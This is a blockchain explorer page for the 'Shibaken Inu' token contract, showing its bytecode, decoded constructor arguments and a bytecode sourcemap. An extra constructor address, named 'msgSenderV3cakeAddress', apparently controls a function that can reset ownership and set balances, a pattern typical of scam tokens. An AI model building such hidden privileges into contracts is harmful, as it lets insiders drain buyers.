e2602791396001600160a01b038616600090815260016020526040902054919061083b565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107e79082610867565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106a79085815260200190565b6000818484111561085f5760405162461bcd60e51b815260040161041191906108ca565b505050900390565b60006108738284610a9a565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156108f7578581018301518582016040015282016108db565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461092f57600080fd5b919050565b6000806040838503121561094757600080fd5b61095083610918565b946020939093013593505050565b60008060006060848603121561097357600080fd5b61097c84610918565b925061098a60208501610918565b9150604084013590509250925092565b6000602082840312156109ac57600080fd5b61087382610918565b6000806000606084860312156109ca57600080fd5b833580151581146109da57600080fd5b9250602084013591506109ef60408501610918565b90509250925092565b60008060408385031215610a0b57600080fd5b610a1483610918565b9150610a2260208401610918565b90509250929050565b600181811c90821680610a3f57607f821691505b602082108103610a5f57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8082018082111561034257634e487b7160e01b600052601160045260246000fdfe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220cf14091d146f11c7647ba99149965057d2bf2ceddae53fda3a7556526819640e64736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000090000000000000000000000003ec4500b495dcd043feed1db227129e84d6ca64a0000000000000000000000000000000000000000000000000de0b6b3a7640000000000000000000000000000000000000000000000000000000000000000000c53686962616b656e20496e750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000853484942414b454e000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Shibaken Inu
Arg [1] : symbol_ (string): SHIBAKEN
Arg [2] : decimals_ (uint8): 9
Arg [3] : msgSenderV3cakeAddress (address): 0x3ec4500B495dcd043FEEd1db227129E84d6cA64A
Arg [4] : totalSupply_ (uint256): 1000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 0000000000000000000000003ec4500b495dcd043feed1db227129e84d6ca64a
Arg [4] : 0000000000000000000000000000000000000000000000000de0b6b3a7640000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [6] : 53686962616b656e20496e750000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [8] : 53484942414b454e000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13879:5846:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14146:28;;;;;;;;;160:25:1;;;148:2;133:18;14146:28:0;;;;;;;;14788:91;;;:::i;:::-;;;;;;;:::i;15823:210::-;;;;;;:::i;:::-;;:::i;:::-;;;1351:14:1;;1344:22;1326:41;;1314:2;1299:18;15823:210:0;1186:187:1;15089:108:0;15177:12;;15089:108;;16233:455;;;;;;:::i;:::-;;:::i;14990:91::-;15064:9;;14990:91;;15064:9;;;;1853:36:1;;1841:2;1826:18;14990:91:0;1711:184:1;16696:300:0;;;;;;:::i;:::-;;:::i;15205:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15356:18:0;15324:7;15356:18;;;:9;:18;;;;;;;15205:177;5672:94;;;:::i;:::-;;5021:87;5067:7;5094:6;-1:-1:-1;;;;;5094:6:0;5021:87;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;5021:87:0;2091:203:1;14887:95:0;;;:::i;17004:401::-;;;;;;:::i;:::-;;:::i;18425:203::-;;;;;;:::i;:::-;;:::i;15390:216::-;;;;;;:::i;:::-;;:::i;14181:21::-;;;;;-1:-1:-1;;;;;14181:21:0;;;15614:201;;;;;;:::i;:::-;-1:-1:-1;;;;;15780:18:0;;;15748:7;15780:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15614:201;5921:192;;;;;;:::i;:::-;;:::i;14788:91::-;14833:13;14866:5;14859:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14788:91;:::o;15823:210::-;15942:4;15964:39;3819:10;15987:7;15996:6;15964:8;:39::i;:::-;-1:-1:-1;16021:4:0;15823:210;;;;;:::o;16233:455::-;16373:4;16390:36;16400:6;16408:9;16419:6;16390:9;:36::i;:::-;16437:221;16460:6;3819:10;16508:139;16564:6;16508:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16508:19:0;;;;;;:11;:19;;;;;;;;3819:10;16508:33;;;;;;;;;;:37;:139::i;:::-;16437:8;:221::i;:::-;-1:-1:-1;16676:4:0;16233:455;;;;;:::o;16696:300::-;3819:10;16811:4;16905:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16905:34:0;;;;;;;;;;16811:4;;16833:133;;16883:7;;16905:50;;16944:10;16905:38;:50::i;5672:94::-;5067:7;5094:6;-1:-1:-1;;;;;5094:6:0;3819:10;5241:23;5233:68;;;;-1:-1:-1;;;5233:68:0;;;;;;;:::i;:::-;;;;;;;;;5737:21:::1;5755:1;5737:9;:21::i;:::-;5672:94::o:0;14887:95::-;14934:13;14967:7;14960:14;;;;;:::i;17004:401::-;17124:4;17146:229;3819:10;17196:7;17218:146;17275:15;17218:146;;;;;;;;;;;;;;;;;3819:10;17218:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;17218:34:0;;;;;;;;;;;;:38;:146::i;18425:203::-;16113:15;;-1:-1:-1;;;;;16113:15:0;3819:10;16113:31;16090:105;;;;-1:-1:-1;;;16090:105:0;;;;;;;:::i;:::-;18528:6:::1;:14:::0;;-1:-1:-1;;;;;18528:14:0;;::::1;-1:-1:-1::0;;;;;;18528:14:0;;::::1;::::0;::::1;::::0;;18553:13:::1;:23:::0;;;18528:6:::1;18587:17:::0;;;18528:14;18587:17:::1;::::0;;;;:33;-1:-1:-1;18425:203:0:o;15390:216::-;15512:4;15534:42;3819:10;15558:9;15569:6;15534:9;:42::i;5921:192::-;5067:7;5094:6;-1:-1:-1;;;;;5094:6:0;3819:10;5241:23;5233:68;;;;-1:-1:-1;;;5233:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6010:22:0;::::1;6002:73;;;::::0;-1:-1:-1;;;6002:73:0;;3932:2:1;6002:73:0::1;::::0;::::1;3914:21:1::0;3971:2;3951:18;;;3944:30;4010:34;3990:18;;;3983:62;-1:-1:-1;;;4061:18:1;;;4054:36;4107:19;;6002:73:0::1;3730:402:1::0;6002:73:0::1;6086:19;6096:8;6086:9;:19::i;:::-;5921:192:::0;:::o;19101:382::-;-1:-1:-1;;;;;19237:19:0;;19229:69;;;;-1:-1:-1;;;19229:69:0;;4339:2:1;19229:69:0;;;4321:21:1;4378:2;4358:18;;;4351:30;4417:34;4397:18;;;4390:62;-1:-1:-1;;;4468:18:1;;;4461:35;4513:19;;19229:69:0;4137:401:1;19229:69:0;-1:-1:-1;;;;;19317:21:0;;19309:69;;;;-1:-1:-1;;;19309:69:0;;4745:2:1;19309:69:0;;;4727:21:1;4784:2;4764:18;;;4757:30;4823:34;4803:18;;;4796:62;-1:-1:-1;;;4874:18:1;;;4867:33;4917:19;;19309:69:0;4543:399:1;19309:69:0;-1:-1:-1;;;;;19391:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19443:32;;160:25:1;;;19443:32:0;;133:18:1;19443:32:0;;;;;;;;19101:382;;;:::o;17413:613::-;-1:-1:-1;;;;;17553:20:0;;17545:71;;;;-1:-1:-1;;;17545:71:0;;5149:2:1;17545:71:0;;;5131:21:1;5188:2;5168:18;;;5161:30;5227:34;5207:18;;;5200:62;-1:-1:-1;;;5278:18:1;;;5271:36;5324:19;;17545:71:0;4947:402:1;17545:71:0;-1:-1:-1;;;;;17635:23:0;;17627:72;;;;-1:-1:-1;;;17627:72:0;;5556:2:1;17627:72:0;;;5538:21:1;5595:2;5575:18;;;5568:30;5634:34;5614:18;;;5607:62;-1:-1:-1;;;5685:18:1;;;5678:34;5729:19;;17627:72:0;5354:400:1;17627:72:0;17792:109;17828:6;17792:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17792:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17772:17:0;;;;;;;:9;:17;;;;;;:129;;;;17935:20;;;;;;;:32;;17960:6;17935:24;:32::i;:::-;-1:-1:-1;;;;;17912:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17983:35;;;;;;;;;;18011:6;160:25:1;;148:2;133:18;;14:177;11386:240:0;11506:7;11567:12;11559:6;;;;11551:29;;;;-1:-1:-1;;;11551:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11602:5:0;;;11386:240::o;9107:98::-;9165:7;9192:5;9196:1;9192;:5;:::i;:::-;9185:12;9107:98;-1:-1:-1;;;9107:98:0:o;6121:173::-;6177:16;6196:6;;-1:-1:-1;;;;;6213:17:0;;;-1:-1:-1;;;;;;6213:17:0;;;;;;6246:40;;6196:6;;;;;;;6246:40;;6177:16;6246:40;6166:128;6121:173;:::o;196:548:1:-;308:4;337:2;366;355:9;348:21;398:6;392:13;441:6;436:2;425:9;421:18;414:34;466:1;476:140;490:6;487:1;484:13;476:140;;;585:14;;;581:23;;575:30;551:17;;;570:2;547:26;540:66;505:10;;476:140;;;480:3;665:1;660:2;651:6;640:9;636:22;632:31;625:42;735:2;728;724:7;719:2;711:6;707:15;703:29;692:9;688:45;684:54;676:62;;;;196:548;;;;:::o;749:173::-;817:20;;-1:-1:-1;;;;;866:31:1;;856:42;;846:70;;912:1;909;902:12;846:70;749:173;;;:::o;927:254::-;995:6;1003;1056:2;1044:9;1035:7;1031:23;1027:32;1024:52;;;1072:1;1069;1062:12;1024:52;1095:29;1114:9;1095:29;:::i;:::-;1085:39;1171:2;1156:18;;;;1143:32;;-1:-1:-1;;;927:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;2299:415::-;2373:6;2381;2389;2442:2;2430:9;2421:7;2417:23;2413:32;2410:52;;;2458:1;2455;2448:12;2410:52;2497:9;2484:23;2550:5;2543:13;2536:21;2529:5;2526:32;2516:60;;2572:1;2569;2562:12;2516:60;2595:5;-1:-1:-1;2647:2:1;2632:18;;2619:32;;-1:-1:-1;2670:38:1;2704:2;2689:18;;2670:38;:::i;:::-;2660:48;;2299:415;;;;;:::o;2719:260::-;2787:6;2795;2848:2;2836:9;2827:7;2823:23;2819:32;2816:52;;;2864:1;2861;2854:12;2816:52;2887:29;2906:9;2887:29;:::i;:::-;2877:39;;2935:38;2969:2;2958:9;2954:18;2935:38;:::i;:::-;2925:48;;2719:260;;;;;:::o;2984:380::-;3063:1;3059:12;;;;3106;;;3127:61;;3181:4;3173:6;3169:17;3159:27;;3127:61;3234:2;3226:6;3223:14;3203:18;3200:38;3197:161;;3280:10;3275:3;3271:20;3268:1;3261:31;3315:4;3312:1;3305:15;3343:4;3340:1;3333:15;3197:161;;2984:380;;;:::o;3369:356::-;3571:2;3553:21;;;3590:18;;;3583:30;3649:34;3644:2;3629:18;;3622:62;3716:2;3701:18;;3369:356::o;5759:222::-;5824:9;;;5845:10;;;5842:133;;;5897:10;5892:3;5888:20;5885:1;5878:31;5932:4;5929:1;5922:15;5960:4;5957:1;5950:15

Swarm Source

ipfs://cf14091d146f11c7647ba99149965057d2bf2ceddae53fda3a7556526819640e
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.